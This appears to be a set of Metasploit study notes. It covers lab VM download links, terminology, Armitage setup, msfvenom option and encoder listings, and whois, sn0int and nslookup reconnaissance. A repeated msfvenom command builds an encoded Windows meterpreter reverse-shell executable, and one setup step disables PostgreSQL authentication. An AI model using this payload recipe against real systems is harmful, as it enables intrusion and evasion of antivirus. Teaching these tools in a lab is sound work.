Windows 2000 Professional
Link: https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm
Extraction code: upsm
Windows Server 2003 Standard x64 Edition
Link: https://pan.baidu.com/s/1Ro-BoTmp-1kq0W_lB9Oiww?pwd=ngsb
Extraction code: ngsb
Windows 7 x64
Link: https://pan.baidu.com/s/1-vLtP58-GXmkau0OLNoGcg?pwd=zp3o
Extraction code: zp3o
Debian 6 (Kali Linux)
Link: https://pan.baidu.com/s/1Uw6SXS8z_IxdkNpLr9y0zQ?pwd=s2i5
Extraction code: s2i5
Apache, Tomcat, MySQL and vsftpd are installed, together with the accompanying web security testing exercises.
cd /usr/local/apache-tomcat-8.5.81/bin
./startup.sh
service mysql start
Open a browser and enter 127.0.0.1:8080/sec/
Metasploitable2-Linux (with vsftpd 2.3.4)
Link: https://pan.baidu.com/s/1a71zOXGi_9aLrXyEnvkHwQ?pwd=17g6
Extraction code: 17g6
After extraction it is a .vmx file and can be used directly.
Basic concepts
Communication protocols
ARP

ICMP

TCP

Terminology
Exploit
A tester uses an exploit to attack a system, program or service in order to obtain a result the developer did not intend. Common kinds are memory overflows, web application vulnerability exploitation and misconfiguration exploits.
Payload
The program we want the attacked system to execute. For example, a reverse shell establishes a connection back from the target machine to the tester, while a bind shell binds a command-execution channel on the target to which the tester's machine connects. A payload can also be a program that runs a limited set of commands on the target machine.
Shellcode
A sequence of instructions used as the payload during an attack; once executed on the target machine it usually provides a shell in which commands can be run.
Module
A Metasploit (MSF) module, made up of a body of code.
Listener
A program on the tester's machine that waits for an incoming connection from the attacked machine.
Encoders
msfencode -l lists the available encoders; the one regarded as most effective is x86/shikata_ga_nai. (msfencode has since been folded into msfvenom; the equivalent is "msfvenom -l encoders", shown below.)
Metasploit user interfaces
MSF console
# msfconsole
msf6 > help connect
MSF command line
# msfconsole -x "script; set rhost [ip]; set lhost [ip]; set PAYLOAD …; run"
(-x takes a single quoted string of console commands separated by semicolons; -r runs the commands from a resource file instead.)
# msfconsole -r path/xxx.rc
Armitage
Installation
Download Armitage: https://gitlab.com/kalilinux/packages/armitage
Extract armitage
# cd armitage
# ./package.sh
# cd release
# ll
drwxr-xr-x 2 root root 4096 6月 29 18:40 unix
drwxr-xr-x 2 root root 4096 6月 29 18:40 windows
# cd /etc/postgresql/14/main/
# gedit pg_hba.conf
Comment out all existing entries so that the local connection lines read:
# "local" is for Unix domain socket connections only
local   all   all   trust
# IPv4 local connections:
host    all   all   127.0.0.1/32   trust
# IPv6 local connections:
host    all   all   ::1/128   trust
(trust lets any local OS user connect as any PostgreSQL role without a password; this is acceptable only on an isolated lab machine.)
# service postgresql stop
# msfdb reinit
# service postgresql start
# cd /home/jerry/下载/armitage-kali-master/release/unix
# ./armitage

Generating the controlled end and the controlling end

Scanning
Metasploit utility programs
MSF payload generator
Source language | Output language |
Python | C |
Web languages | JavaScript |
# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options]
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
Parameter | Long form | Description |
-l | --list <type> | List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all |
-p | --payload <payload> | Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom |
| --list-options | List --payload <value>'s standard, advanced and evasion options |
-f | --format <format> | Output format (use --list formats to list) |
-e | --encoder <encoder> | The encoder to use (use --list encoders to list) |
| --service-name <value> | The service name to use when generating a service binary |
| --sec-name <value> | The new section name to use when generating large Windows binaries. Default: random 4-character alpha string |
| --smallest | Generate the smallest possible payload using all available encoders |
| --encrypt <value> | The type of encryption or encoding to apply to the shellcode (use --list encrypt to list) |
| --encrypt-key <value> | A key to be used for --encrypt |
| --encrypt-iv <value> | An initialization vector for --encrypt |
-a | --arch <arch> | The architecture to use for --payload and --encoders (use --list archs to list) |
| --platform <platform> | The platform for --payload (use --list platforms to list) |
-o | --out <path> | Save the payload to a file |
-b | --bad-chars <list> | Characters to avoid. Example: '\x00\xff' |
-n | --nopsled <length> | Prepend a nopsled of [length] size on to the payload |
| --pad-nops | Use the nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length) |
-s | --space <length> | The maximum size of the resulting payload |
| --encoder-space <length> | The maximum size of the encoded payload (defaults to the -s value) |
-i | --iterations <count> | The number of times to encode the payload |
-c | --add-code <path> | Specify an additional win32 shellcode file to include |
-x | --template <path> | Specify a custom executable file to use as a template |
-k | --keep | Preserve the --template behaviour and inject the payload as a new thread |
-v | --var-name <value> | Specify a custom variable name to use for certain output formats |
-t | --timeout <seconds> | The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable) |
-h | --help | Show this message |
MSF encoders
# msfvenom -l encoders
Framework Encoders [--encoder]
Name | Rank | Description |
cmd/brace | low | Bash Brace Expansion Command Encoder |
cmd/echo | good | Echo Command Encoder |
cmd/generic_sh | manual | Generic Shell Variable Substitution Command Encoder |
cmd/ifs | low | Bourne ${IFS} Substitution Command Encoder |
cmd/perl | normal | Perl Command Encoder |
cmd/powershell_base64 | excellent | Powershell Base64 Command Encoder |
cmd/printf_php_mq | manual | printf(1) via PHP magic_quotes Utility Command Encoder |
generic/eicar | manual | The EICAR Encoder |
generic/none | normal | The "none" Encoder |
mipsbe/byte_xori | normal | Byte XORi Encoder |
mipsbe/longxor | normal | XOR Encoder |
mipsle/byte_xori | normal | Byte XORi Encoder |
mipsle/longxor | normal | XOR Encoder |
php/base64 | great | PHP Base64 Encoder |
ppc/longxor | normal | PPC LongXOR Encoder |
ppc/longxor_tag | normal | PPC LongXOR Encoder |
ruby/base64 | great | Ruby Base64 Encoder |
sparc/longxor_tag | normal | SPARC DWORD XOR Encoder |
x64/xor | normal | XOR Encoder |
x64/xor_context | normal | Hostname-based Context Keyed Payload Encoder |
x64/xor_dynamic | normal | Dynamic key XOR Encoder |
x64/zutto_dekiru | manual | Zutto Dekiru |
x86/add_sub | manual | Add/Sub Encoder |
x86/alpha_mixed | low | Alpha2 Alphanumeric Mixedcase Encoder |
x86/alpha_upper | low | Alpha2 Alphanumeric Uppercase Encoder |
x86/avoid_underscore_tolower | manual | Avoid underscore/tolower |
x86/avoid_utf8_tolower | manual | Avoid UTF8/tolower |
x86/bloxor | manual | BloXor - A Metamorphic Block Based XOR Encoder |
x86/bmp_polyglot | manual | BMP Polyglot |
x86/call4_dword_xor | normal | Call+4 Dword XOR Encoder |
x86/context_cpuid | manual | CPUID-based Context Keyed Payload Encoder |
x86/context_stat | manual | stat(2)-based Context Keyed Payload Encoder |
x86/context_time | manual | time(2)-based Context Keyed Payload Encoder |
x86/countdown | normal | Single-byte XOR Countdown Encoder |
x86/fnstenv_mov | normal | Variable-length Fnstenv/mov Dword XOR Encoder |
x86/jmp_call_additive | normal | Jump/Call XOR Additive Feedback Encoder |
x86/nonalpha | low | Non-Alpha Encoder |
x86/nonupper | low | Non-Upper Encoder |
x86/opt_sub | manual | Sub Encoder (optimised) |
x86/service | manual | Register Service |
x86/shikata_ga_nai | excellent | Polymorphic XOR Additive Feedback Encoder |
x86/single_static_bit | manual | Single Static Bit |
x86/unicode_mixed | manual | Alpha2 Alphanumeric Unicode Mixedcase Encoder |
x86/unicode_upper | manual | Alpha2 Alphanumeric Unicode Uppercase Encoder |
x86/xor_dynamic | normal | Dynamic key XOR Encoder |
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF payloads

MSF NOPs
# msfvenom -l nops
Framework NOPs (11 total)
Name | Description |
aarch64/simple | Simple NOP generator |
armle/simple | Simple NOP generator |
cmd/generic | Generates harmless padding for command payloads. |
mipsbe/better | Better NOP generator |
php/generic | Generates harmless padding for PHP scripts |
ppc/simple | Simple NOP generator |
sparc/random | SPARC NOP generator |
tty/generic | Generates harmless padding for TTY input |
x64/simple | An x64 single/multi byte NOP instruction generator. |
x86/opty2 | Opty2 multi-byte NOP generator |
x86/single_byte | Single-byte NOP generator |
MSF platforms
# msfvenom -l platforms
Framework Platforms [--platform]
========================================
Name
----
aix
android
apple_ios
arista
brocade
bsd
bsdi
cisco
firefox
freebsd
hardware
hpux
irix
java
javascript
juniper
linux
mainframe
mikrotik
multi
netbsd
netware
nodejs
openbsd
osx
php
python
r
ruby
solaris
unifi
unix
unknown
Windows
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF architectures (for --payload and --encoder)
# msfvenom -l archs
Framework Architectures [--arch]
========================================
Name
----
aarch64
armbe
armle
cbea
cbea64
cmd
dalvik
firefox
java
mips
mips64
mips64le
mipsbe
mipsle
nodejs
php
ppc
ppc64
ppc64le
ppce500v2
python
r
ruby
sparc
sparc64
tty
x64
x86
x86_64
zarch
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF encryption or encoding types applied to the shellcode
# msfvenom -l encrypt
Framework Encryption Formats [--encrypt]
================================================
Name
----
aes256
base64
rc4
xor
MSF file formats
# msfvenom -l formats
Framework Executable Formats [--format]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
elf
elf-so
exe
exe-only
exe-service
exe-small
hta-psh
jar
jsp
loop-vbs
macho
msi
msi-nouac
osx-app
psh
psh-cmd
psh-net
psh-reflection
python-reflection
vba
vba-exe
vba-psh
vbs
war
Framework Transform Formats [--format]
==============================================
Name
----
base32
base64
bash
c
csharp
dw
dword
hex
java
js_be
js_le
num
perl
pl
powershell
ps1
py
python
raw
rb
ruby
sh
vbapplication
vbscript
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
Viewing a payload's options
# msfvenom -p moduleName --list-options
For example:
msfvenom -p windows/shell_reverse_tcp --list-options

Nasm shell
The Netwide Assembler (NASM) is an assembler and disassembler for the x86 architecture. It can be used to write 16-bit (8086, 80286, etc.), 32-bit (IA-32) and 64-bit (x86_64) programs, and is regarded as one of the most popular assemblers on the Linux platform.
NASM was originally developed by Simon Tatham with the assistance of Julian Hall. As of 2016 it is maintained by a small team led by Hans Peter Anvin. It is open-source software released under the simplified BSD licence (2-clause BSD License).
cd /usr/share/metasploit-framework/tools/exploit
# ./nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
nasm >
Metasploit Express & Metasploit Pro
Information gathering
Passive information gathering
Whois
Syntax
msf > whois example.com
msf > whois 192.168.1.100
Example
msf6 > whois 3testing.com
[*] exec: whois 3testing.com
Domain Name: 3TESTING.COM
Registry Domain ID: 513017975_DOMAIN_COM-VRSN
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://www.net.cn
Updated Date: 2017-06-27T15:41:17Z
Creation Date: 2006-07-09T13:24:36Z
Registry Expiry Date: 2023-07-09T13:24:36Z
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar IANA ID: 420
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Registrar Abuse Contact Phone: +86.95187
Domain Status: ok https://icann.org/epp#ok
Name Server: DNS10.HICHINA.COM
Name Server: DNS9.HICHINA.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2022-06-20T04:09:37Z <<<
msf6 > whois 123.56.135.186
[*] exec: whois 123.56.135.186
% [whois.apnic.net]
% Whois data copyright termshttp://www.apnic.net/db/dbcopyright.html
% Information related to '123.56.0.0 - 123.57.255.255'
% Abuse contact for '123.56.0.0 - 123.57.255.255' is 'ipas@cnnic.cn'
inetnum:123.56.0.0 - 123.57.255.255
netname:ALISOFT
descr: Aliyun Computing Co., LTD
descr: 5F, Builing D, the West Lake International Plaza of S&T
descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country:CN
admin-c:ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
abuse-c:AC1601-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-irt:IRT-CNNIC-CN
last-modified: 2021-06-16T01:25:33Z
source: APNIC
irt:IRT-CNNIC-CN
address:Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks:Please note that CNNIC is not an ISP and is not
remarks:empowered to investigate complaints of network abuse.
remarks:Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
last-modified: 2021-06-16T01:39:57Z
source: APNIC
role: ABUSE CNNICCN
address:Beijing, China
country:ZZ
phone: +000000000
e-mail: ipas@cnnic.cn
admin-c:IP50-AP
tech-c: IP50-AP
nic-hdl:AC1601-AP
remarks:Generated from irt object IRT-CNNIC-CN
abuse-mailbox: ipas@cnnic.cn
mnt-by: APNIC-ABUSE
last-modified: 2020-05-14T11:19:01Z
source: APNIC
person: Li Jia
address:NO.969 West Wen Yi Road, Yu Hang District, Hangzhou
country:CN
phone: +86-0571-85022088
e-mail: jiali.jl@alibaba-inc.com
nic-hdl:ZM1015-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2014-07-30T02:02:01Z
source: APNIC
person: Guoxin Gao
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone: +86-0571-85022600
fax-no: +86-0571-85022600
e-mail: anti-spam@list.alibaba-inc.com
nic-hdl:ZM875-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2014-07-30T01:56:01Z
source: APNIC
person: security trouble
e-mail: yitian.gaoyt@alibaba-inc.com
address:5th,floor,Building D,the West Lake International Plaza of S&T,391#Wen??r Road
address:Hangzhou, Zhejiang, China
phone: +86-0571-85022600
country:CN
mnt-by: MAINT-CNNIC-AP
nic-hdl:ZM876-AP
last-modified: 2021-04-13T23:22:33Z
source: APNIC
person: Guowei Pan
address:5F, Builing D, the West Lake International Plaza of S&T
address:No.391 Wen'er Road, Hangzhou City
address:Zhejiang, China, 310099
country:CN
phone: +86-0571-85022088-30763
fax-no: +86-0571-85022600
e-mail: guowei.pangw@alibaba-inc.com
nic-hdl:ZM877-AP
mnt-by: MAINT-CNNIC-AP
last-modified: 2013-07-09T01:34:02Z
source: APNIC
% Information related to '123.56.128.0/19AS4837'
route: 123.56.128.0/19
descr: CNC Group CHINA169 Fujian Province Network
descr: Addresses from APNIC(YJZXNET)
country:CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
last-modified: 2008-09-04T07:55:26Z
source: APNIC
% This query was served by the APNIC Whois Service version 1.88.16 (WHOIS-AU3)
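The two records above are plain key/value text in two dialects: the registrar record uses "Key: Value" with repeated keys (Name Server), while the APNIC record uses "key:value" with "%" comment lines. The parser below is an added example (not part of the original notes) that turns such output into a dictionary of lists and extracts the abuse contacts and name servers a defender needs when reporting or scoping an incident; the sample input is constructed from a few lines of the records above.

```python
import re
from collections import defaultdict

# Constructed sample mixing the two dialects shown above: a registrar
# record ("Key: Value", repeated keys) and an APNIC RPSL record
# ("key:value", "%" comment lines).
SAMPLE_WHOIS = """\
Domain Name: 3TESTING.COM
Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd.
Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com
Name Server: DNS10.HICHINA.COM
Name Server: DNS9.HICHINA.COM
>>> Last update of whois database: 2022-06-20T04:09:37Z <<<
% [whois.apnic.net]
% Abuse contact for '123.56.0.0 - 123.57.255.255' is 'ipas@cnnic.cn'
inetnum:123.56.0.0 - 123.57.255.255
netname:ALISOFT
country:CN
abuse-mailbox: ipas@cnnic.cn
"""

# A key is letters/digits/spaces/dashes up to the first colon.
LINE_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 _-]*?):\s*(.*)$")

def parse_whois(text):
    """Parse whois text into {key: [values]}; keys are lower-cased and
    repeated keys (e.g. Name Server) keep every value. Comment lines
    ('%', '#') and the '>>> ... <<<' footer are skipped."""
    fields = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "%#" or line.startswith(">>>"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        fields[m.group(1).strip().lower()].append(m.group(2).strip())
    return dict(fields)

def abuse_contacts(fields):
    """Every e-mail address the record designates for abuse reports."""
    contacts = []
    for key in ("registrar abuse contact email", "abuse-mailbox"):
        contacts.extend(fields.get(key, []))
    return sorted({c.lower() for c in contacts})

def name_servers(fields):
    """Authoritative name servers listed in the registrar record."""
    return [ns.lower() for ns in fields.get("name server", [])]
```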
netcraft
https://www.netcraft.com/
https://searchdns.netcraft.com/


Maltego
sn0int
Installation
# apt install debian-keyring
# gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add -
# apt-key adv --keyserver keyserver.ubuntu.com --refresh-keys git@rxv.cc
# echo "deb http://apt.vulns.sexy stable main" > /etc/apt/sources.list.d/apt-vulns-key.list
# apt update
# apt install sn0int
# sn0int
[sn0int][default] > pkg quickstart
Usage
[sn0int][default] > workspace demo
[+] Connecting to database
[sn0int][demo] > add domain
[?] Domain: baidu.com
[sn0int][demo] > select domains
#1, "baidu.com"
[sn0int][demo] > use ctlogs
[sn0int][demo][kpcyrd/ctlogs] > run
[*] "baidu.com" : Adding subdomain "durobotdev.baidu.com"
[*] "baidu.com" : Adding subdomain "play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "www.play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "dlswbr.baidu.com"
[*] "baidu.com" : Adding subdomain "otapcdn.baidu.com"
[*] "baidu.com" : Adding subdomain "foundation.baidu.com"
[*] "baidu.com" : Adding subdomain "mdm-duguanjia.baidu.com"
[*] "baidu.com" : Adding subdomain "lookup.api.bsb.baidu.com"
[*] "baidu.com" : Adding subdomain "download.api.bsb.baidu.com"
[*] "baidu.com" : Adding subdomain "duke.baidu.com"
[*] "baidu.com" : Adding subdomain "ditan.huodong.baidu.com"
[*] "baidu.com" : Adding subdomain "httpsdns.baidu.com"
[*] "baidu.com" : Adding subdomain "vpn.baidu.com"
[*] "baidu.com" : Adding subdomain "otacdn.baidu.com"
[*] "baidu.com" : Adding subdomain "trafficsafe.baidu.com"
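Certificate-transparency results like the ones above are most useful to a defender as an inventory of their own externally visible hosts. The script below is an added example (not part of the original notes or of sn0int) that parses this output format, de-duplicates the names, rejects anything outside the selected scope domain and groups the remainder by the first label under that domain; the sample input is constructed, including a duplicate line and an out-of-scope name added to exercise those checks.

```python
import re

# Constructed sample in the sn0int ctlogs output format shown above; the
# duplicate "vpn" line and the "example.net" line are added deliberately
# to exercise de-duplication and the scope check.
SAMPLE_CTLOGS = """\
[*] "baidu.com" : Adding subdomain "vpn.baidu.com"
[*] "baidu.com" : Adding subdomain "www.play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "play-infoflow.baidu.com"
[*] "baidu.com" : Adding subdomain "vpn.baidu.com"
[*] "baidu.com" : Adding subdomain "baidu.com.example.net"
[+] Connecting to database
"""

LINE_RE = re.compile(r'^\[\*\] "([^"]+)" : Adding subdomain "([^"]+)"$')

def in_scope(name, scope):
    """True if name is the scope domain itself or a host beneath it."""
    return name == scope or name.endswith("." + scope)

def parse_ctlogs(text, scope):
    """Return (sorted unique in-scope hosts, names that fall outside scope)."""
    found, out_of_scope = set(), []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # progress/status lines carry no host name
        name = m.group(2).lower().rstrip(".")
        if in_scope(name, scope):
            found.add(name)
        else:
            out_of_scope.append(name)
    return sorted(found), out_of_scope

def group_by_parent(hosts, scope):
    """Group hosts by their first label below the scope domain, so that
    www.play-infoflow.baidu.com and play-infoflow.baidu.com sit together."""
    groups = {}
    for name in hosts:
        rel = name[: -(len(scope) + 1)]      # drop the trailing ".baidu.com"
        groups.setdefault(rel.split(".")[-1], []).append(name)
    return groups
```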
ZoomEye


nslookup
msf6 > nslookup
set type=mx
example.com
Example
msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server: 8.8.8.8
Address:8.8.8.8#53
Non-authoritative answer:
Name: www.3testing.com
Address: 123.56.135.186
msf6 > nslookup www.3testing.com
[*] exec: nslookup www.3testing.com
Server: 192.168.0.1
Address: 192.168.0.1#53
Non-authoritative answer:
Name: www.3testing.com
Address: 123.56.135.186